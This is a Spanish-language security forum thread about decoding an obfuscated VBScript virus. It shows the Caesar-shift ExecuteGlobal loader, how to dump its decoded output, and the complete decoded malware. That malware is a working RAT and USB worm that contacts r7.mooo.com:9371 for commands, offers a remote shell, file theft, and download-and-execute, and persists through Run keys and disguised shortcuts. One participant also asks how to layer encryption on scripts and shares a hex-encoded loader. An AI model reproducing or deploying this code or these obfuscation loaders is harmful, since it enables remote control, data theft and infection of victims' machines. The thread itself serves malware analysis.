˜›šŽžžKhK™ ˜›šŽžžKQKš•”Ÿ˜Y™Œ˜KQKM§M854™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•”Ÿ˜Y›šŽžž”KQKM§M85KKKK™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•”Ÿ˜Y£Ž ŸŒ—›ŒŸ“KQKž›—”Ÿ85™£Ÿ85™K‘ ™ŽŸ”š™8585ž K£”Ÿ›šŽžžKS›”T85š™KšKž ˜K™£Ÿ8585ž“——š•Y ™KMŸŒž––”——KZqKZKZ{toKMKQK›”WbWŸ 85™Kž 8585ž K—Ÿ‘Œ‘KS —T85š™KšKž ˜K™£Ÿ8585‘”—ž¤žŸ˜š•Y—Ÿ‘”—K —85‘”—ž¤žŸ˜š•Y—Ÿ‘š—K —8585™Kž 8585‘ ™ŽŸ”š™KŽ˜ž“——KSŽ˜T8585”˜K“ŸŸ›š•Wš£ŽWŒŒ——‘š˜Œ™¤8585žŸKš£ŽKhKž“——š•Y£ŽKSMPŽš˜ž›ŽPKZŽKMKQKŽ˜T85”‘K™šŸKš£ŽYžŸš ŸYŒŸ™š‘žŸŒ˜KŸ“™85KKKŒŒ——‘š˜Œ™¤KhKš£ŽYžŸš ŸYŒŒ——85—ž”‘K™šŸKš£ŽYžŸYŒŸ™š‘žŸŒ˜KŸ“™85KKKŒŒ——‘š˜Œ™¤KhKš£ŽYžŸYŒŒ——85—žK85KKKŒŒ——‘š˜Œ™¤KhKMM85™K”‘8585Ž˜ž“——KhKŒŒ——‘š˜Œ™¤85™K‘ ™ŽŸ”š™"))
  2. sddfskcIdCLcsoSkso()
  3. Function sddfskcIdCLcsoSkso()
  4. For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)
  5. hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
  6. next
  7. executeglobal hsDCcocssccCaVICC
  8. End Function
  9. Function dcssLdchdcdDCsiijSS(sStr)
  10. Do
  11. i = i + &H1
  12. bLen = Left(sStr, i)
  13. dcssLdchdcdDCsiijSS = i
  14. Loop While sStr <> bLen
  15. End Function

                                          Gracia de antemano.  :laugh:
En línea



Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: descifrar virus (.vbs)
« Respuesta #1 en: 19 Octubre 2017, 16:45 pm »

Pues lo bueno de aquí, es que puedes ver como se decifra el string encodeado, así hay que seguir la secuencia:

La string encodeada:
Código
  1. dDssDajcooSLscaC = (("“šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b

Está es la función para descifrar el encode, a modo de ejemplo sólo tome los primeros 2 caracteres del encode, que en realidad serian 5
Código
  1. dDssDajcooSLscaC = (("“š"))
  2. msgbox dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)
  3.  
  4. Function dcssLdchdcdDCsiijSS(sStr)
  5.    Do
  6.        i = i + &H1             ' &H1 Es hexadecimal que equivale a 1, es decir, incrementa la variable i de 1 en 1, manteniendo el valor
  7.        bLen = Left(sStr, i)    ' Recorre el encode de izquierda al valor incrementado de i
  8.        dcssLdchdcdDCsiijSS = i ' Devuelve el valor real del tamaño de la cadena encodeada
  9.    Loop While sStr <> bLen
  10. End Function

La siguiente función es la que se encarga de descifrar el valor del encode, veamos:
Código
  1. Function sddfskcIdCLcsoSkso()
  2.    For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC) ' Toma la función anterior para obtener el tamaño real del encode
  3.        hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
  4.    Next
  5.    ExecuteGlobal hsDCcocssccCaVICC ' Ejecución del encode
  6. End Function

En la Linea 3, es donde esta el decifrado el usa las siguientes funciones:
Código
  1. CHRW ' devuelve un carácter Unicode; sin embargo, en los sistemas que no son compatibles con el conjunto de caracteres Unicode, la función se comporta de forma idéntica a CHR.
  2. ASC ' Convierte el primer carácter de una cadena en código ANSI y devuelve el resultado.
  3. MID ' Devuelve un número específico de caracteres de una cadena.

Veamos la conversión con las dos primeros caracteres del encode,

[AHORA SIGO xD]
« Última modificación: 19 Octubre 2017, 16:58 pm por Shell Root » En línea

Te vendería mi talento por poder dormir tranquilo.
ThunderCls


Desconectado Desconectado

Mensajes: 455


Coder | Reverser | Gamer


Ver Perfil WWW
Re: descifrar virus (.vbs)
« Respuesta #2 en: 21 Octubre 2017, 07:15 am »

Esta es una técnica muy usada en malware vbs o cualquier otro tipo de script y es bien sencillo obtener el decifrado, lo unico que se necesita es sustituir la linea #7:

Código
  1. executeglobal hsDCcocssccCaVICC

por las siguientes:

Código
  1. Set file = fso.CreateTextFile("D:\decrypted.txt", True)
  2. file.write(hsDCcocssccCaVICC)
  3. file.close

Luego en "decrypted.txt" estará el código descifrado del malware. Aquí lo paso luego de descifrarlo y arreglar algún que otro caracter. Es básicamente una variante de un malware que analice hace ya algún tiempo en mi blog

(AVISO: NO EJECUTAR DIRECTAMENTE EN EL S.O PRINCIPAL, ESTA ES UNA MUESTRA REAL DE UN MALWARE REAL. Avisados quedan todos)

Código
  1. host = "r7.mooo.com"
  2. port = 9371
  3. installdir = "%appdata%"
  4. lnkfile = true
  5. lnkfolder = false
  6.  
  7.  
  8. dim shellobj
  9. set shellobj = wscript.createobject("wscript.shell")
  10. dim filesystemobj
  11. set filesystemobj = createobject("scripting.filesystemobject")
  12. dim httpobj
  13. set httpobj = createobject("msxml2.xmlhttp")
  14.  
  15.  
  16.  
  17. installname = wscript.scriptname
  18. startup = shellobj.specialfolders ("startup") & "\"
  19. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  20. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  21. spliter = "<" & "|" & ">"
  22. sleep = 5000
  23. dim response
  24. dim cmd
  25. dim param
  26. info = ""
  27. usbspreading = ""
  28. startdate = ""
  29. dim oneonce
  30.  
  31.  
  32. on error resume next
  33.  
  34.  
  35. instance
  36. while true
  37.  
  38. install
  39.  
  40. response = ""
  41. response = post ("is-ready","")
  42. cmd = split (response,spliter)
  43. select case cmd (0)
  44. case "excecute"
  45.      param = cmd (1)
  46.      execute param
  47. case "update"
  48.      param = cmd (1)
  49.      oneonce.close
  50.      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
  51.      oneonce.write param
  52.      oneonce.close
  53.      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  54.      wscript.quit
  55. case "uninstall"
  56.      uninstall
  57. case "send"
  58.      download cmd (1),cmd (2)
  59. case "site-send"
  60.      sitedownloader cmd (1),cmd (2)
  61. case "recv"
  62.      param = cmd (1)
  63.      upload (param)
  64. case  "enum-driver"
  65.      post "is-enum-driver",enumdriver  
  66. case  "enum-faf"
  67.      param = cmd (1)
  68.      post "is-enum-faf",enumfaf (param)
  69. case  "enum-process"
  70.      post "is-enum-process",enumprocess  
  71. case  "cmd-shell"
  72.      param = cmd (1)
  73.      post "is-cmd-shell",cmdshell (param)  
  74. case  "delete"
  75.      param = cmd (1)
  76.      deletefaf (param)
  77. case  "exit-process"
  78.      param = cmd (1)
  79.      exitprocess (param)
  80. case  "sleep"
  81.      param = cmd (1)
  82.      sleep = eval (param)        
  83. end select
  84.  
  85. wscript.sleep sleep
  86.  
  87. wend
  88.  
  89.  
  90. sub install
  91. on error resume next
  92. dim lnkobj
  93. dim filename
  94. dim foldername
  95. dim fileicon
  96. dim foldericon
  97.  
  98. upstart
  99. for each drive in filesystemobj.drives
  100.  
  101. if  drive.isready = true then
  102. if  drive.freespace  > 0 then
  103. if  drive.drivetype  = 1 then
  104.    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  105.    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
  106.        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
  107.    end if
  108.    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  109.        if not lnkfile then exit for
  110.        if  instr (file.name,".") then
  111.            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  112.                file.attributes = 2+4
  113.                if  ucase (file.name) <> ucase (installname) then
  114.                    filename = split(file.name,".")
  115.                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
  116.                    lnkobj.windowstyle = 7
  117.                    lnkobj.targetpath = "cmd.exe"
  118.                    lnkobj.workingdirectory = ""
  119.                    lnkobj.arguments = "/c start " & replace(file.name," ", chrw(34) & " " & chrw(34)) & "&start " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
  120.                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  121.                    if  instr (fileicon,",") = 0 then
  122.                        lnkobj.iconlocation = file.path
  123.                    else
  124.                        lnkobj.iconlocation = fileicon
  125.                    end if
  126.                    lnkobj.save()
  127.                end if
  128.            end if
  129.        end if
  130.    next
  131.    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  132.        if not lnkfolder then exit for
  133.        folder.attributes = 2+4
  134.        foldername = folder.name
  135.        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
  136.        lnkobj.windowstyle = 7
  137.        lnkobj.targetpath = "cmd.exe"
  138.        lnkobj.workingdirectory = ""
  139.        lnkobj.arguments = "/c start " & replace(folder.name," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
  140.        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  141.        if  instr (foldericon,",") = 0 then
  142.            lnkobj.iconlocation = folder.path
  143.        else
  144.            lnkobj.iconlocation = foldericon
  145.        end if
  146.        lnkobj.save()
  147.    next
  148. end If
  149. end If
  150. end if
  151. next
  152. err.clear
  153. end sub
  154.  
  155. sub uninstall
  156. on error resume next
  157. dim filename
  158. dim foldername
  159.  
  160. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  161. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  162. filesystemobj.deletefile startup & installname ,true
  163. filesystemobj.deletefile wscript.scriptfullname ,true
  164.  
  165. for  each drive in filesystemobj.drives
  166. if  drive.isready = true then
  167. if  drive.freespace  > 0 then
  168. if  drive.drivetype  = 1 then
  169.    for  each file in filesystemobj.getfolder ( drive.path & "\").files
  170.         on error resume next
  171.         if  instr (file.name,".") then
  172.             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  173.                 file.attributes = 0
  174.                 if  ucase (file.name) <> ucase (installname) then
  175.                     filename = split(file.name,".")
  176.                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  177.                 else
  178.                     filesystemobj.deletefile (drive.path & "\" & file.name)
  179.                 end If
  180.             else
  181.                 filesystemobj.deletefile (file.path)
  182.             end if
  183.         end if
  184.     next
  185.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  186.         folder.attributes = 0
  187.     next
  188. end if
  189. end if
  190. end if
  191. next
  192. wscript.quit
  193. end sub
  194.  
  195. function post (cmd ,param)
  196.  
  197. post = param
  198. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  199. httpobj.setrequestheader "user-agent:",information
  200. httpobj.send param
  201. post = httpobj.responsetext
  202. end function
  203.  
  204. function information
  205. on error resume next
  206. if  inf = "" then
  207.    inf = hwid & spliter
  208.    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
  209.    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
  210.  
  211.    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  212.    set os = root.execquery ("select * from win32_operatingsystem")
  213.    for each osinfo in os
  214.       inf = inf & osinfo.caption & spliter  
  215.       exit for
  216.    next
  217.    inf = inf & "plus" & spliter
  218.    inf = inf & security & spliter
  219.    inf = inf & usbspreading
  220.    information = inf  
  221. else
  222.    information = inf
  223. end if
  224. end function
  225.  
  226.  
  227. sub upstart ()
  228. on error resume Next
  229.  
  230. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  231. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  232. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  233. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  234.  
  235. end sub
  236.  
  237.  
  238. function hwid
  239. on error resume next
  240.  
  241. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  242. set disks = root.execquery ("select * from win32_logicaldisk")
  243. for each disk in disks
  244.    if  disk.volumeserialnumber <> "" then
  245.        hwid = disk.volumeserialnumber
  246.        exit for
  247.    end if
  248. next
  249. end function
  250.  
  251.  
  252. function security
  253. on error resume next
  254.  
  255. security = ""
  256.  
  257. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  258. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  259. for each objitem in colitems
  260.    versionstr = split (objitem.version,".")
  261. next
  262. versionstr = split (colitems.version,".")
  263. osversion = versionstr (0) & "."
  264. for  x = 1 to ubound (versionstr)
  265. osversion = osversion &  versionstr (i)
  266. next
  267. osversion = eval (osversion)
  268. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  269.  
  270. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  271. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  272.  
  273. for each objantivirus in colantivirus
  274.    security  = security  & objantivirus.displayname & " ."
  275. next
  276. if security  = "" then security  = "nan-av"
  277. end function
  278.  
  279.  
  280. function instance
  281. on error resume next
  282.  
  283. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  284. if usbspreading = "" then
  285.   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
  286.      usbspreading = "true - " & date
  287.      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  288.   else
  289.      usbspreading = "false - " & date
  290.      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  291.  
  292.   end if
  293. end If
  294.  
  295.  
  296.  
  297. upstart
  298. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
  299. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
  300. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  301.    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  302.    wscript.quit
  303. end If
  304. err.clear
  305. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  306. if  err.number > 0 then wscript.quit
  307. end function
  308.  
  309.  
  310. sub sitedownloader (fileurl,filename)
  311.  
  312. strlink = fileurl
  313. strsaveto = installdir & filename
  314. set objhttpdownload = createobject("msxml2.xmlhttp" )
  315. objhttpdownload.open "get", strlink, false
  316. objhttpdownload.send
  317.  
  318. set objfsodownload = createobject ("scripting.filesystemobject")
  319. if  objfsodownload.fileexists (strsaveto) then
  320.    objfsodownload.deletefile (strsaveto)
  321. end if
  322.  
  323. if objhttpdownload.status = 200 then
  324.   dim  objstreamdownload
  325.   set  objstreamdownload = createobject("adodb.stream")
  326.   with objstreamdownload
  327. .type = 1
  328. .open
  329. .write objhttpdownload.responsebody
  330. .savetofile strsaveto
  331. .close
  332.   end with
  333.   set objstreamdownload = nothing
  334. end if
  335. if objfsodownload.fileexists(strsaveto) then
  336.   shellobj.run objfsodownload.getfile (strsaveto).shortpath
  337. end if
  338. end sub
  339.  
  340. sub download (fileurl,filedir)
  341.  
  342. if filedir = "" then
  343.   filedir = installdir
  344. end if
  345.  
  346. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  347. set objhttpdownload = createobject("msxml2.xmlhttp")
  348. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
  349. objhttpdownload.send ""
  350.  
  351. set objfsodownload = createobject ("scripting.filesystemobject")
  352. if  objfsodownload.fileexists (strsaveto) then
  353.    objfsodownload.deletefile (strsaveto)
  354. end if
  355. if  objhttpdownload.status = 200 then
  356.    dim  objstreamdownload
  357. set  objstreamdownload = createobject("adodb.stream")
  358.    with objstreamdownload
  359. .type = 1
  360. .open
  361. .write objhttpdownload.responsebody
  362. .savetofile strsaveto
  363. .close
  364. end with
  365.    set objstreamdownload  = nothing
  366. end if
  367. if objfsodownload.fileexists(strsaveto) then
  368.   shellobj.run objfsodownload.getfile (strsaveto).shortpath
  369. end if
  370. end sub
  371.  
  372.  
  373. function upload (fileurl)
  374.  
  375. dim  httpobj,objstreamuploade,buffer
  376. set  objstreamuploade = createobject("adodb.stream")
  377. with objstreamuploade
  378.     .type = 1
  379.     .open
  380. .loadfromfile fileurl
  381. buffer = .read
  382. .close
  383. end with
  384. set objstreamdownload = nothing
  385. set httpobj = createobject("msxml2.xmlhttp")
  386. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
  387. httpobj.send buffer
  388. end function
  389.  
  390.  
  391. function enumdriver ()
  392.  
  393. for  each drive in filesystemobj.drives
  394. if   drive.isready = true then
  395.     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
  396. end if
  397. next
  398. end Function
  399.  
  400. function enumfaf (enumdir)
  401.  
  402. enumfaf = enumdir & spliter
  403. for  each folder in filesystemobj.getfolder (enumdir).subfolders
  404.     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
  405. next
  406.  
  407. for  each file in filesystemobj.getfolder (enumdir).files
  408.     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
  409.  
  410. next
  411. end function
  412.  
  413.  
  414. function enumprocess ()
  415.  
  416. on error resume next
  417.  
  418. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  419. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  420.  
  421. dim objitem
  422. for each objitem in colitems
  423. enumprocess = enumprocess & objitem.name & "|"
  424. enumprocess = enumprocess & objitem.processid & "|"
  425.    enumprocess = enumprocess & objitem.executablepath & spliter
  426. next
  427. end function
  428.  
  429. sub exitprocess (pid)
  430. on error resume next
  431.  
  432. shellobj.run "taskkill /F /T /PID " & pid,7,true
  433. end sub
  434.  
  435. sub deletefaf (url)
  436. on error resume next
  437.  
  438. filesystemobj.deletefile url
  439. filesystemobj.deletefolder url
  440.  
  441. end sub
  442.  
  443. function cmdshell (cmd)
  444.  
  445. dim httpobj,oexec,readallfromany
  446.  
  447. set oexec = shellobj.exec ("%comspec% /c " & cmd)
  448. if not oexec.stdout.atendofstream then
  449.   readallfromany = oexec.stdout.readall
  450. elseif not oexec.stderr.atendofstream then
  451.   readallfromany = oexec.stderr.readall
  452. else
  453.   readallfromany = ""
  454. end if
  455.  
  456. cmdshell = readallfromany
  457. end function
En línea

-[ "…I can only show you the door. You're the one that has to walk through it." – Morpheus (The Matrix) ]-
http://reversec0de.wordpress.com
https://github.com/ThunderCls/
**Aincrad**


Desconectado Desconectado

Mensajes: 683



Ver Perfil WWW
Re: descifrar virus (.vbs)
« Respuesta #3 en: 22 Octubre 2017, 16:55 pm »

Muy bueno gracias . ya entendí. 

una pregunta : y si quiero usar esa técnica de cifrado en por lo menos este script:

Código
  1. msgbox "prueba de cifrado"

como lo encriptaria con por lo menos 3 capas de cifrado ?
En línea



MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.519


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: descifrar virus (.vbs)
« Respuesta #4 en: 22 Octubre 2017, 18:24 pm »

Muy bueno gracias . ya entendí. 

una pregunta : y si quiero usar esa técnica de cifrado en por lo menos este script:

Código
  1. msgbox "prueba de cifrado"

como lo encriptaria con por lo menos 3 capas de cifrado ?

Por lo que veo, es cifrado CAESAR: https://en.wikipedia.org/wiki/Caesar_cipher


Código
  1. ***
  2. hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
  3. ***
  4.  

No es difícil implementar ese cifrado con las pasadas que quieras.

Saludos!
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

**Aincrad**


Desconectado Desconectado

Mensajes: 683



Ver Perfil WWW
Re: descifrar virus (.vbs)
« Respuesta #5 en: 22 Octubre 2017, 18:43 pm »

ah , ok .

bueno yo convierto el texto a hex y me baso en este viejo virus wsf .

Código
  1. <?XML version="1.0"?><job>
  2.  
  3. <script language="VBScript">
  4.  
  5. <![CDATA[
  6.  
  7. FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")
  8.  
  9. ExecuteGlobal FACEBOOKFACEBOOK
  10.  
  11. Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function
  12.  
  13. ]]>
  14.  
  15. </script>
  16.  
  17. </job>

el code que pase a hex fue msgbox "hola" que al pasarlo quedo
6D7367626F782022686F6C6122 y como me base en este code puedo codificar cualquier vbs.

y en cualquier caso para descifrar el code , según lo que me acaban de explicar quedaría asi:

Código
  1. <?XML version="1.0"?><job>
  2.  
  3. <script language="VBScript">
  4.  
  5. <![CDATA[
  6.  
  7. FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")
  8.  
  9. Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function
  10.  
  11. Set fso = CreateObject("scripting.filesystemobject")
  12. Set fichero = fso.CreateTextFile("decrypted.txt", True)
  13. fichero.write(FACEBOOKFACEBOOK)
  14. fichero.close
  15.  
  16. ]]>
  17.  
  18. </script>
  19.  
  20. </job>

 Gracias por las explicaciones . .  ;-)
En línea



Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[AYUDA-VBS] Para descifrar este virus
Análisis y Diseño de Malware
danny920825 3 3,700 Último mensaje 21 Diciembre 2013, 08:08 am
por danny920825
Descifrar "Virus" de la Policia
Ingeniería Inversa
madivan 1 3,150 Último mensaje 10 Febrero 2015, 11:29 am
por el-brujo
Como descifrar archivos por virus criptográfico ransonware?
Seguridad
Rnovatis 7 3,783 Último mensaje 30 Septiembre 2016, 00:09 am
por MCKSys Argentina
descifrar virus .wsf
Scripting
**Aincrad** 2 3,296 Último mensaje 9 Agosto 2017, 18:27 pm
por tincopasan
descifrar codigo de un virus js
Análisis y Diseño de Malware
Flamer 3 3,690 Último mensaje 31 Octubre 2018, 21:29 pm
por gundream
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines